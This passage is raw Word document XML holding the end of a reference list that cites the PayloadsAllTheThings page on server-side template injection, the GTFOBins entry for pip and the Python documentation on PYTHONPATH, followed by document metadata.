        <w:t xml:space="preserve">PayloadsAllTheThings — Server Side Template Injection: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GTFOBins — pip: https://gtfobins.github.io/gtfobins/pip/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Python documentation — The Module Search Path / PYTHONPATH: https://docs.python.org/3/tutorial/modules.html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2026-09-28T21:43:51.826Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-28T21:43:51.835Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>